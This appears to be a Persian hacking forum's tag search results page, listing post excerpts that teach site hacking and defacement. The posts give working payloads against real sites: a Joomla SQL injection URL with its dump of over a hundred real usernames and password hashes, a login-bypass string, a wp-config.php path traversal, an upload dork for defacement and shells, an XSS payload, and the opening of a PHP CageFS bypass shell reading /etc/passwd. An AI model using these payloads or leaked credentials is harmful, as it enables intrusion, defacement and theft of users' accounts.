جستجو در تالار

در حال نمایش نتایج برای برچسب های 'سایت هکینگ'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


Product Groups

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالار ها

  • اخبار و اعلانات انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • بخش مسابقات انجمن
    • انتقادات و پیشنهادات
    • افتخارات و اطلاعیه های تیم گارد ایران
    • بخش ارتقاء کاربران
    • اخبار هک و امنیت
    • اکسپلویت های ثبت شده توسط تیم امنیتی گارد ایران
    • برنامه ها و ابزارهای نوشته توسط گارد ایران
  • بخش های خصوصی انجمن گاردایران
    • سوال و جواب های عمومی
    • بخش خصوصی
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • بخش کرک و رمزنگاری
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Mikrotik
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

دسته ها

  • ویدیوهای آموزشی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


محل سکونت


Interests

22 نتیجه پیدا شد

  1. DeMoN

    باسلام خدمت دوستان گل گارد ایران.این باگ بسیار تارگت های زیادی داره. ابتدا دورک کد PHP: inurl:option=com_tag بعدد این اکسپلوریت و ب اخر ادرس اضافه کن کد PHP: index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component بعد رمز ادمین و تمام کاربرای سایت و بهت میده که باید کرک کنی تا رمز اصلی بدستت بیاد همین اینو ادرس و ببینید حتما متوجه میشید. کد PHP: http://www.eldoceblog.com.ar/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=componen t یوزر پسورد کد PHP: uhs16bh0ff1:03da8ebdc907de99ab136b910f2c176f:wzhsY2lsdOSY8qfoonzerfwSUgQog9oG:Registered,RuineeCenTuse:ce6d22250374561b8a44c413366463f1:AHxXlDDYnF3uKDyCZetZPWrlvTaTzHJP:Registered,ldx7v2o0y1s:2d4252f1a7b813b1953145d7fb6ace35:HCzd3NO2PdwsRWD7lT7ypS0C1NzOnW4k:Registered,notfl:a053c5bcb94965f6c2115f863af5410c:Vkni051ZsRRSFNNEryvRmImQQDa7agGy:Bloggers,notdpf:b73038b419b6e45637fd6d0661d1a78d:Ls71M34Md4LkcQi8kPSczgRK6pbLXi0G:Bloggers,notprs:e9ac4de97f82ccb5c7ba58297dee4599:GWmvksty6pRgzMQ23zDJ2p9W5P0omQhb:Bloggers,nottf:01cf6d9dd79781997b79c2e6116720ae:m7OijSh3Mg5Gsf6jFnfVueX8kZpJCdi4:Bloggers,maca:b0a16ffe8d18a8ff8c939cb6562f2d98:BGjwJonlCNxMrYn2diaxGmqvZchAZlPh:Manager,notcj:20859b839eab28d8ec20168aa91c0702:h8dp0PAhodBz6Rg7WiC8Xbjmd1HaIY8l:Bloggers,fernando:f12176debaacbc2c8df8801d9ce61762:RRbVK0vvaayMwCDbuwO3VprmqPae0R2K:Super Administrator,Poigma:dbe4ac9117a8bdfb33540e6cb436dbf0:wOfm0qdmU6Y39OFdRBbqEasnclVt72E5:Registered,passm:6d36a8415ba717c7997dc4b8c69813a6:7SXixpFIPRMiLgOApg9m00gSuP2XnhpJ:Bloggers,mcardarelli:60ffc723c55510fed14b837d24eb57d7:EVphmPbG8zxkVQJusIUsIpYwb0iIAYFd:Super Administrator,jmartinez:81f9b64bba3e7173ec55cb8867e05bd3:AwBgVA2Hlkcjtswl2Zqv1vlqWyEy5roc:Bloggers,rbattaglino:3dc4f70ee011b06a1e63018c287af296:jvW18dEeRv2J1XizwEAXRGBzdngZtvHx:Bloggers,cfantini:fe2e6059f00ee1751b17268255f784dc:UIL84SQhEFrkP1f5rLXMeiRK6BUtawOJ:Bloggers,drsabagh:a57833ccebd00963ae0fe31d36f420a5:m1fmT7QbGvcAcQsirwYOVzzJfcTFafO7:Bloggers,eldoceblog:dcec177b8c35a8d8cce5a2ad42aa1384:8JVNUQNJfdrcB0qOqw0D4eMKGHHzxIEw:Bloggers,nottgu:58b7dd1c0f74c3d197b8637894ed2df2:bBK7jG4LzWzodJPmCZagzx2KBm6WojZG:Bloggers,bpqlmhaic:83191c03563c2394645938dccf866747:RM5NJ6VPGTFJbqODxODbyeili6ZW1dR3:Registered,mcqdgyjm:7d56bbc315a6322bc49704c98a1b14f4:Pqjr9Wd3afmWOxUgQam8umbPkDQlfBFc:Registered,qdkrpermv:039c071f1b0389b1fa68b22951dee708:nctL730058fXlVuJOqOxJ6xOrIiJUDJO:Registered,jcqmfuqj:1b1a7479e0a25bd938a1fcfc4b8c779e:K2YRLMtXEJBdyyP44PV9LYA6PMhoYTup:Registered,itanuawlwar:7207f4dfc38c17f1e90c5c85a1a92ed5:Ky595rwJnMLae0nzrrYiEFE9QsyZOfWZ:Registered,Jagmaawarne:94a934b06647b51f8b43321ccce22150:8vFO15ew5GpFFyrUnGJbnI0p1PNaxVZu:Registered,Lindainlsq:b96cd3b9a388c83fb9c54ab4b15d726a:P8uA9S04OqCn3sG5jtT3SG0whHM2AFR9:Registered,pixrumnbcikiar :b3e4185ed84d8154f1d350871b3c7acf:GLaZfrSfXeIkP2Ta2EAWMGxbqkwV6p2o:Registered,oqlvucphuakm:82504aff74e84b1cdfed43ba6eebf7b2:FuQ1DqDFbbijDoW5e5mS4uTdoo9MZtk0:Registered,mcqpeixa:e75ae2fef2a8b0dbdb2b76758961695f:kAe3NWAVhzTrvUg3ULgvPj509ucXXi6w:Registered,Tattfuergylug:cd41dc24c50affc767c0ccb91e36c500:szVeVfcsPPBn5HKEf8APvyC5RomebNT5:Registered,lakeshabrentnal:35b80df934770ea43efa877ecd322f9a:tzmtF1WYapXM8YvbdX5eyV8lSafIqvxQ:Registered,cexexcaby:b16b93d74547bdefdea44e0b4b0a3a66:fsqchpGrgAozKtVF2vMbPf9Wy3tRngIC:Registered,ev7of0n1i1:b211faac87d1829741fefee24640652a:Wc7DMTWCEx6NcNHDpwapjtUp4hktvw64:Registered,lionlionov94:62083001cd4e55b8de21a9d78d41f542:99GGOv9EgADQRAb2v257VdtLdsLNvrfL:Registered,PRICYDRED:2c71d4ae3ba4aac3f787f5d4a6654b74:vRjQDJDWEr9Exa5En71KSt4EftwVlRKh:Registered,loyattgeovosy:5de3f749deeacfed85d660221f25be11:mPVYGS7rwLzYs09hytG22JxJaoW5TvbJ:Registered,Fruttphetle:9f4e50c585dcdd58f8e67874416dc111:wrZrGlX5GI92cz6jUdUoXbXUfnt781Oy:Registered,szybka pozyczka:f6ed603d45b2b52c59e674d109d2d3e7:ylf2R0phRdccKqgUBbaLGnfrrY7bqQ3e:Registered,sherellquist:30b1cbb5029de43b60797bdacace8164:MvoSekJecVvtQ5F3T8Z6fkfFCTLPGpYp:Registered,soccere:dde6d9dd364315492f314596a77724ba:2cxVAfK22a2SRDfpVYOymxWvP9SNRCUz:Registered,tavaClawn:fab72c1cd8e2f6d4a816efb8f53d8084:nRm1E92b9lRAA6p6qZF09yKa3e9kOiyW:Registered,RizBruttiGGer:f0067a8da323b2b79e5faf1a96e12594:ODbj1tSQf5ZvMHTsgq3mfS5DV9GVfcu9:Registered,Irrettekick:2e2ac70458c59caca91f07eae0e4cc8d:w5KdGDLS2P7tWyfJhYoCkle4sDwCvWX9:Registered,wthvqeqle:29128ad6089296febf13d4df716ad3eb:hgdcZZ211PWzi6BYpUXR6GyDUpRYMesW:Registered,roopsybribrak:94599d204adcd80947459fe3c47c29fb:C5GHSeJJzoAWi6OMojXxpabSuoHn3QuZ:Registered,scammajelve:985797b3d10e434fa3e896558960ed80:soymTef38ryeJKSgnQnd6JftGmuKbcUK:Registered,Erommurgitirl:f4feefaf8625907c8c760cf39149f071:RPuP1MbDerILuGAc25YSwsRLrerHLDVm:Registered,Sireworic:ced32b4b681c3db32c96d9278b8f306d:evGr2vJdyrO27ojwOF31p0Vi7vZljVs9:Registered,tdcasinoum:123bc1776494b621c959025395245077:iMQgfg6IESEMsj9DsAaZ7ypASugDtjmA:Registered,Stussyaddessy:bc5e4620accdf2d287c82b1361a47e04:0YaEux9NRHpQ7ubRCDL4jkk6xk5LgzqM:Registered,mxperhapsat:cca3a950e2d46e88e7141daa6c818c2c:9m2StFIKsKkeag7fUQKj3WSbqmZRZ5fB:Registered,DellBealm:c35c17817cff02cc13e45de270826c3c:k4XDteHCb1AYsslSSWbLqqp7RKAc17KS:Registered,Stoodsthoutty:e759edc4b5a035140a19c1001f3450b5:LLiQ4kmKBHrwbzrISFypxy3SU1kqcO7Q:Registered,pewproommern:ca2e27acfc744f88a31787313159852e:L0gSpUjA3FMjtQGJ2pNukDa1gdAsmu36:Registered,Raxybypeanync:c82b2bb6558e6e652b70095d5cf18202:ZgaWbUi4WF7PCsvMtLxWz50LKibyi2fZ:Registered,sueptpoonenry:47be956a2fc3c5dd60ce1dc30ba879a6:pvXWdr6fi89VFcxdznaNkKDtoJjDGQPb:Registered,itaxiaSog:712a83347cb16c221ef102a9d85ab46f:3Hh0ygxYObHrwi5sn22p28qPDqO19DGD:Registered,Pikavippi:6d0de3a90f9e7d2452e4c61a899c16ef:dBWvAFmFNu9xpZPrqndCahY9Pmhs2AOO:Registered,luettamartinat:fe981f239dba3f059715b2d13046305a:bU8MR7No7akWkCRHHxEBjw6f5jxpaoEU:Registered,jcqzfgft:9ea17a7177e19c3fa7c2d83f31894238:FdslMbY979JjHanmT3OTcuLTj8fXTghw:Registered,qpqteqscs:fa499ec1b9b258397af9631cca6a31dc:1BnsFcq8Y6WhwxfCxnnt9VofvaOKVXRj:Registered,ncqsyxeh:a8a32628e840cf951e80121fbc25078e:3I1ZZ0G2NIYmyD3O2jbfHHyLrbQvM0qL:Registered,qpqgsersx:7debb38ea2ad3857448a3320b7affb6c:h6SGQdo1DND0dgc14zQ5hXy8q4d915hA:Registered,rpqjvjyzt:d9cd1e36a3fb8e9cb88dc9edd9bd0d0e:ViilaMDfMPW8cLsfp8oPB0Nu4y8VRiop:Registered,gcqginfy:0828720db32f91f0ed4ca9a5adcfc475:Mtmi7NlDAaQUA0FVkI89dglGuETCUq0w:Registered,elcapo:2ec869e1846922ed5dec839121ef622c:OVEDZ47TFchmIGdZHcsci3LOU1rGfWIp:Registered,gjfqubgg:ca0d6223c9921d6eecb85a5a32d7e40b:ERfQ7bz9X9ebNnkwTKLlXG7DTaPihOap:Registered,wd5a72v4bza:5ff6706b26bea40d52290944166eb9a0:dsurrJ7wA4ztcoIniy3tWpVsQphvDmoN:Registered,Godieguille:075cf076bdd8e2398c06a884a5cd1614:qoROfyj1q9JAHjC206r6c5UbuUGA90Zu:Registered,ocqbzodp:63353152d1efbf1663b90e796e406173:cjusemacgDZJqHpee5bGi5EakKyAwx2I:Registered,ipqjenfmv:3ee4519c31ed4473c8a9ed0b16151835:lSQHpoHhxbhFM4LVUT2unl95rdwfpxRy:Registered,qcqmwjph:81199d1f8d2f1ecc1ef54ae3d31593bf:dwudXGnD1O0XAg6XHCUYT4TUdxDT2Liq:Registered,gjhyiwtf:72140203914c0e5bf827747e5a3a24a2:o1N1vxjD5r5Iwm0MmREbhOcBvAQ5xKrc:Registered,inhapyZiplild:29687540e875e5144333d41682aaca54:ZXlE5NCZep9ASFtusqs46zibXIy3rAhP:Registered,emizine:d82794818f9ad7eea16e158f239e8053:m1SECl144TzFxnKTlkcPmiEpBsmIGTVr:Registered,aluxibo:3fa245fd42b8a55d1008ae49d0bc6e1c:zPFWXZZo5uJdEEpxBRmb2vZxWUrsdjGC:Registered,epqtalllx:960804dc17ba16cffb1d42bcb85961e7:t3Gk4NPUp0nnYnqlUJD8UECJgQ10D1bq:Registered,npqbvfljq:252b27532e9519e9a5f6f1ce3d49db72:1hjvnP7cOEi1V40JvZVCKTzapEhDxKOC:Registered,spoubepiree:c17b9ec9fe751aa999e5a2d227cc4239:UgtZYFjeIdIKYsfssa73wnH2xQQQQgOP:Registered,kasabroot:8864f55f68bd3fc21145d98833968712:PBDVtoO2NYHkPSOkmcD89IFtOiYT3CEw:Registered,kalliefarber:5c7beef5f8aca13fa746b6d7bea19493:74Pbj6hzOoxJpy44pX9YdyBnS4jusXYt:Registered,noli:f6272d470853e135b8dc238a20a1ad7b:RW3DQHpLCTuMHKjhlpZ9upALO0x9ROCd:Registered,vr883q4ujpr:0ebe28552876d6c6dbe8342654305676:OFiyNyLJqvQQGiw18Uug4G387Ow9NINW:Registered,icqsidim:71984c95cefdf32fe76eba2154cb05fa:ow8NyXUlJHFR0G3HpNmgxa1WpPhz1kMA:Registered,gustavopupich:7e08c58be2aa89ef1e4415f6cbbecb65:YcIXvuVnfwCVg0vcpLBNTwsI3FFZgZV3:Registered,outradedo:7e7dccabdeac19ace6dccb4b8c3d9d9b:1DXFbn6uR64WsIwHF0soadVcmzozd2Np:Registered,smagAlamp:358ceea490c3a92cd88c380c3bb183bf:cdGbMGhOfiwmWDDohazMUSuZJt59GGXh:Registered,GoriePreofder:b1f5f48f3aa2447c9990418552476396:KcUi2uRAGF0f5cDgxGO27NskhWJ56W9C:Registered,luli:64de6e815fe854e066f8dd6d7dc6e3ae:F1BaBXLcHhaZfq9h9srbpcYMK9bddMIb:Registered,whiled4801:13a2e72d577a804e77726d6194a55ed4:Jgg5tu6gw6YY3MItj3zrVTGjaGEsddxJ:Registered,sdshbdogfdh:a9bf372d052b8de5ab200b2fe607c044:OQfWprpKWSsIiBJWKtqInzWc0N9FwvOv:Registered,cpqsyakev:da7b86994113c06a8d1f4f8a83d1ea6a:Tc32oj5MMHUUZ4mzajc0tjtyRd4VjxOa:Registered,lkxmqxgmil:461f0aa0c789cc70dfed69559123d51d:fzHUNLgaB2xjHnU3jF3qfG15Ssk0XJBn:Registered,neweffovamymn:1640b00682bd72526228588d45eda7be:nJuIY1onXk4QVaZgdUCUumVsAgGWhbah:Registered,ealjgxrtzef:6b04e286e96819f23605823894150f00:Sq7GNOxdr5AzkfsBWLGaVvGRnSAZssjO:Registered,elba_de_garcia:c39d29ffc83144e58b0552821952f2d5:ruhSLYStijHQiz2GO8qgidN5CDtYdlbY:Registered,wx1g6wps9t8:d2aec83d024470ace3e16c5f88f63710:evFQ3DpTqRsYxNvfIK0Sf9vX5vlCpOMu:Registered,Tisebroorie:ecd71d965ecc1d0b1c9c91e2e092b497:seEKGNXYaF5gsKDtUpLdlVBkYMf9GOfR:Registered,[email protected]<script cf-hash='f9e31' type="text/javascript"> /* */</script>:544d88f2c2d67d32667a06f6da2e501a:A5Iq69sygp6C24bl05UdZ49k95I0noQZ:Registered,eltsleyseri:1ed43577f3a4d8d497833800977feace:3gzMh3ArZ7bZ57kwKF5EjYzLbkAoRi1b:Registered,mary alb:0fcf90aa99048e95c1cf900436814e3d:IgHzZlzrFly8Y25kMA4kExEINpl4vnzy:Registered,rcpicco:0647715abe6719258b4bdf21d96a65c2:8BLd3oCM1aAxidFgsJJtIzH0NtW57Aib:Registered,kcqxueby:a72006b27a0d5311c46dcf5a883831e9:eEUyCHlm9Cp6elVkuBShDZ4IEF1l8BET:Registered,Ephellmef:1b383fabb25262065800656a1e3744b3:f05PPLn0tETKygHcfMdQtvT0DXg20qsE:Registered,overtip:73d0c5ec31a24c73584f0444b7522cb9:KEvwSYlywGw0CRKXRjAXZ5no5nES29nj:Registered,Evorodeeday:7401b8b07f83e0b807e28bb7d9ae07c5:LFGbWqpeL1jspMeT1MtIGKenhciB4u6K:Registered,MELMIRASOLES:a6ea7ccf6fe3ffe2d4adb5447e5b1e9b:ILu0iHrFzkIvZcqhvRZ2Yx6YtFPHfGJh:Registered,GPUENTE:ad71a90512ab00eb730421506fb86813:1SMpPdV4vAK32jy3mVREytergT2FJMzK:Registered,Pigreefug:690c92e5246b3277b6bdf061767caa2f:jClMZa8mLBTFajSCB9ZircIhbMv3E0Ke:Registered,luis alberto:b25b524a904afa77168e85c3df8b2d66:ZhMIhfqBGzDKYJtU5aRw4TUgkmrIqmGV:Registered,dpqrnximc:a880d8349504986c0e940b83be228278:puCLX3JPNG6q4aA32UqdT4HllTb0qyvO:Registered,fcaaesbts:7cf01b5d0124bb54ffae2d9ef40bb1dc:ylnbUfifttZHJ3yI7NUiYrpACa8t40HS:Registered,horasoro:83520878ba07cb1a2bd8f609ef3cb222:Plb1t63r5OrkEv9onFzloBcD0G3VThIU:Registered,DINOCBA:573822f069444966cd5d42eb00afe13f:RcMygvSejODnPSSxlhFui6qWsJnkisxl:Registered,mcambur:ff4a8cc39222bc8fe62ef71c3b58a0a9:1xMKeMDeprsToovex6xwUPwC4qEG8J6F:Registered,ttbbootpin کد PHP: uhs16bh0ff1:03da8ebdc907de99ab136b910f2c176f اولی یوزر هست بعد اون پسورد هک کردن سایت های ایرانی ممنوع بوده. یا حق
  2. سلام خدمت عزیزان گارد ایران. در این درس تصویری شمارو به نحوه بایپس پسورد cms وردپرس و نفوذ وهک کردن سایت آشنا میکنم.همونطور که میدونید تعداد تارگت های وردپرس بسیار زیاده و شما با این باگ و باگهایی که براتون خواهم گذاشت یکی از دیفیسر های خوب خواهید شد. امیدوارم لذت ببرین،در ضمن تشکر فراموش نشه. Pass:guardiran.org یا حق
  3. سلام خدمت عزیزان گارد ایران،در خدمت شما هستیم با آموزش آپلود شل و دیفیس سایت جوملا. نام کامل باگ:JCE Joomla Extension Remote File Upload Pass:guardiran.org http://s3.picofile.com/file/8202884826/Jomla_Shell_Upload_Full_Privet_8.zip.html فقط عذرخواهم که تو انجمن آپ نشد چون هرکار کردم نتونستم آپ کنمش،به هر مقدار بهشی که تقسیم کردم نشد. ارور internet server error میداد. فردا در انجمن آپ میکنم. اسکریپت مورد استفاده در آموزش پیوست شد. Pass:guardiran.org یاحق Jomla-Script.zip
  4. سلام خدمت دوستان عزیز گارد ایران. خوب دوستان اینم یک آموزش مفید و بسیار کاربردی برای دوستان. pass:guardiran.org برای استفاده از آموزش ابتدا تمامی فایل ها رو دانلود و در یک پوشه اکسترکت نمایید. یا حق Jomla Shell Upload Full Privet 8.part1.rar Jomla Shell Upload Full Privet 8.part2.rar
  5. سلام به دوستان عزیز. آسیب پذیری در BBcode ادیتور انجمن ساز IP.board که چند روز پیش توسط تیم امنیتی گارد ایران کشف و گزارش شد متاسفانه آسیب پذیری رو به نام خودشون به ثبت میرسوندن. خوب پس تصمیم گرفتیم آسیب پذیری رو ثبت کنیم ولی میدونیم که از این آسیب پذیری سو استفاده هایی خواهد شد. پس سریع تر اقدام به رفع این آسیب پذیری کنید لینک های آموزشی : یوتیوب آپاراتhttp://www.aparat.com/v/KbtVs http://iedb.ir/exploits-5406.html ########################### # IPB BBcode Editor Cross Site Scripting Vulnerability ########################### * Title: IPB BBcode Editor Cross Site Scripting * date: 7/15/2016 * Exploit Author : Guardiran Security Team * Google Dork : intext:\"Community Forum Software by IP.Board \" * Vendor Homepage: https://invisionpower.com/features/apps * Application : http://invision-virus.com/forum/index.php/files/file/388-ipboardv346-illuson-nulled/ * Version : All Version * Tested On : Kali Linux w3af / Windows 8.1 HEllo Guys. This Is a Xss Vulnerability Our forums application is the latest incarnation of the industry-leading IP.Board community forum software, powering thousands of communities online. Redesigned for even greater integration with the IPS Community Suite, it\'s the most powerful way to enable discussion on your website. ------------------ Description XSS: This CMS And Have Xss Vulnerability. We Cnd Run Our Script In site. The First Havt To Register. After the confirmation e-mail account settings up.Go to the Edit Signature Use of the press BBcode.Then choose one of the options The box of available codes Paige put Deface.Better code is written in Java Script Sample Deface Page JavaScript : http://s6.picofile.com/file/8259569200/new_1.txt.html [Or] You can send in a post above actions.This vulnerability by sending an e also will be displayed Use of the press BBcode.Then choose one of the options The box of available codes Paige put Deface.Better code is written in Java Script Also The vulnerability is approved zone-h.org.It is also well documented Demo: http://forum.mythicwow.com/ http://five-m.ir/forum/ http://owl-gaming.com/forum/ http://forum.t-pasokhgoo.ir/ http://surin.ir/ http://www.nosazihormozgan.ir/forums/ * Special Tnx : cod3!nj3ct!0n , REX , alizombie , DR.GrYgHoN , MR.IMAN , reza attacker , 1TED , Comrade , dastmale-sorkh * Discovered By : MR.IMAN ~~ Y!D:demon.hacker37 * We Are Guardiran Security Team ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-07-16] ###########################
  6. DangerBoY

    به نام برنامه نویس هستی سلامی دوباره به اعضای انجمن گارد ایران . امروز معروف ترین باگ بین هکرها رو برای شما آوردم این باگ برای استخراج اطلاعات سایت از جمله یوزر و پسورد سایت هست . البته این باگ رو من توی دو بخش متوسط و حرفه ای براتون میزارم چون بعضی ها روش دستیش شاید براشون سخت باشه . =============================================================================================================== Bug name : SQL وضعیت : پچ نشده تعداد سایت های دارای این باگ در گوگل : بی شمار دورک ها : بی شمار ( دورک های زیادی برای سایت های عربی و.... وجود داره ) =============================================================================================================== آموزش هکرها : ابتدا دورک زیر رو توی گوگل سرچ کنید . سپس یکی از سایتها رو باز کنید و این علامت رو جلوش بزارید ' این علامت برای اینه که بفهمیم سایت باگ sql داره یا نه دورک : inurl : index.php?id=1 ( برای پیدا کردن سایت های بیشتر این باگ اون 1 رو به عدد های دیگه تبدیل کنید ) خب وقتی علامت رو اضافه کردید اگر سایت دوباره بدون هیچ مشکلی لود شد یعنی سایت باگ نداره اما اگر با چنین اروری مواجه شدید یعنی سایت باگ داره : err fetch static page>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 1' at line 1 خب تا الان فهمیدیم سایت باگ داره حالا نحوه هکش رو به صورت یه فیلم ازسیستم خودم واستون آماده کردم : لینک فیلم آموزشی : http://s6.picofile.com/file/8239638042/SQL.rar.html فیلم واضح و گویاس . در آخر تشکر یادتون نره . لینک دانلود نرم افزاری که در فیلم استفاده شده اسمش نرم افزار hAVIJ هستش: http://up.hgdownloadcenter.ir/up/hgdownloadcenter/app/Havij/Havij%201.15%20Pro_hgdc.tk_.rar قسمت بعدی این باگ روش هک به صورت دستی باگ SQL
  7. DangerBoY

    به نام برنامه نویس هستی سلامی دوباره به اعضای انجمن گارد ایران امروز یه باگ برای دیفیسرا آوردم که عاشقش میشن . این باگ فقط مخصوص دیفیسرا هستش و هیچ کاربردی برای هکرها نداره . این باگ نه نیازی به طزریق اکسپلوت داره نه Bypass این باگ در عرض 5 ثانیه دیفیس شما رو با فرمت html و یا حتی شل شما رو با فرمت html آپلود میکنه ( البته آپلود شل یکمی سخته ) به هر حال محبوب ترین باگ برای دیفیسرا هستش . =============================================================================================================== Bug name : Kindeditor وضعیت : پچ نشده تعداد سایت های دارای این باگ در گوگل : About 324 results برای : مس دیفیس و دیفیس کامل ============================================================================================================= آموزش دیفیسرا : ابتدا دورک زیر رو توی گوگل سرچ کنید و یکی از تارگنت های هدف رو انتخاب کنید بعدش کلید Upload رو بزنید و دیفیس خودتونو آپلود کنید . بعدش آدرس داده شده رو جلوی آدرس سایت کپی پیست کنید و تماااااام برید ثبتش کنید دورک :inurl:kindeditor/examples/uploadbutton.html ( نیازی به اکسپلوت نیست خود دورک کار اکسپلوت رو میکنه ) ============================================================================================================= ( قابل ثبت در zone و zone-h ) ( شل هم آپلود میشه البته باید Bypass کنید ) در آخر تشکر یادتون نره یاعلی
  8. درود. ابتدا گوگل دورک: intext:"Powered by MAXSITE 1.10" پنل ادمین: /index.php?name=admin Type in: ' OR '1'='1' -- For both username and password and then login. (Don't forget to add space after --) Demo: Demo: http://www.asianlife.byethost4.com/index.php?name=admin http://pyc.payap.ac.th/chi2009/index.php?name=admin http://www.lannapoly.ac.th/web2550/quality/web/index.php?name=admin
  9. DeMoN

    ####################################################################### # # Exploit Title: Cms Made Simple multi vulnerability 1.11.10 # Date: 2014 12 June # Author: Dr.3v1l # Vendor Homepage: http://www.cmsmadesimple.org # Version : 1.11.10 # Tested on: Windows # Category: webapps # Google Dork: intext:"powered by CMS Made Simple" # ####################################################################### # # [+] Exploit : # # Cross site scripting (xss) : # # POST input <default_cms_lang> was set to <fa_IR" onmouseover=prompt(3v1l) bad="> # http://<server>/cmsmadesimple/Install/index.php?sessiontest=1'>http://<server>/cmsmadesimple/Install/index.php?sessiontest=1 # http://<server>/cmsmadesimple/Install/index.php # # Host header attack : # # http://<server>/cmsmadesimple/admin/login.php # # PoC : cmsmadesimple\admin\themes\NCleanGrey\login.php # # . # . # . # # <p id="img"><?php echo lang('login_info')?>:</p> # <?php echo lang('login_info_params')?> # # // #vulnerability is here # <span>( <?php echo $_SERVER['HTTP_HOST'];?> )</span> # // --end # # </div> # </div> # <div class="login"> # . # . # . # . # # -------------------------- # # /cmsmadesimple/index.php # ####################################################################### # # [+] Contact Me : # # B.Devils.B@gmail.com # Twitter.com/Doctor_3v1l # IR.linkedin.com/in/hossein3v1l # http://about.me/Hossein.Hezami # https://www.facebook.com/hossein3v1l # http://doctor3v1l.tumblr.com # http://instagram.com/doctor3v1l # Hossein Hezami - Black_Devils B0ys # ####################################################################### # B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , Emperor Team # specially of brother Medrik for keep me again researching .. ####################################################################### سلام خدمت دوستان عزیز گارد ایران. خوب در این تاپیک براتون تمامی اکسپلویت های سرور های لینوکس رو قرار میدم و امیدوارم لذت ببرین. یا حق
  10. DeMoN

    درود بر تمامی عزیزان گارد ایران. در این تاپیک اکسپلویت های مختلف قرار میگیرند. اکسپلویت هایی از قبیل آپلود شل و دیفیس در CMS های مختلف. قوانین تاپیک: 1-اسپم ممنوع 2-طرح سوال در بخش مربوطه. 3-چیزی به جز اکسپلویت در این تاپیک قرار نخواهد گرفت. موفق باشید. ############################################################################################ Wordpress Plugin Slider Revolution 4.1.4 سلام از طریق باگ پلاگین Slider Revolution می توان فایل config.php را دانلود و اطلاعات DataBase را مشاهده کرد. DORK: revslider.php "index of" POC http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php DEMO www.redkatana.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php www.gaeliccollege.edu/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  11. به نام خدا سلام خدمت دوستان عزیز گارد ایران. در این تاپیک قصد تشریح باگ J.Bird SQL Injection رو دارم ما از این متد در اینجکت دیتابیس استفاده میکنیم. ============================================================= خوب دوستان از همین جا تاپیک رو شروع میکنم. خوب برای اینکه بدون تست تشخیص بدید که نیاز هست از این متد در دیتابیس هکینگ استفاده کنیم یا نه باید ارور هارو مورد بررسی قرار بدید. ارور های این دیتا بیس مانند Fire هست. برخی از این ارورها عبارت اند از: warning: + php یه تابع (function): ibase_query() ibase_fetch_row() ibase_fetch_object() ibase_fetch_assoc() ibase_free_result() برای مثال تارگت زیر: http://seafarer.od.ua/?page=study&course=2%27 اروری که مشاهده میکنیم: Warning: ibase_query(): Dynamic SQL Error SQL error code خوب دوستان این مقدمه ای بر این متد بود. این متد رو در پست های بعدی عملی خواهیم داشت. یا حق
  12. DeMoN

    سلام خدمت تمامی عزیزان یتم. در این آموزش تصویری خدمت شما هستیم با آموزش باگ PRIV8 CSR باگی ساده و با تارگت های بالا خدمت شما عزیزان. امیدوارم لذت ببرین. تشکر فراموش نشه. یا حق Recordings.part1.rar Recordings.part2.rar
  13. DeMoN

    <?php #Priv8 CageFS BYPASS #By Br0keN #/etc/passwd <center> <html dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Priv8 CageFS Bypass</title> <style type="text/css" media="screen"> body { font-size: 10px; font-family: verdana; } INPUT { BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #ffffff; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428 } </style> </head> <body dir="ltr" alink="#D50428" bgcolor="#ffffff" link="#00c000" text="#D50428" vlink="#000000"> <p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=5><b>Priv8 CageFS Bypass<br></font> <p align="center" dir="rtl"><font color="#D50428"><span 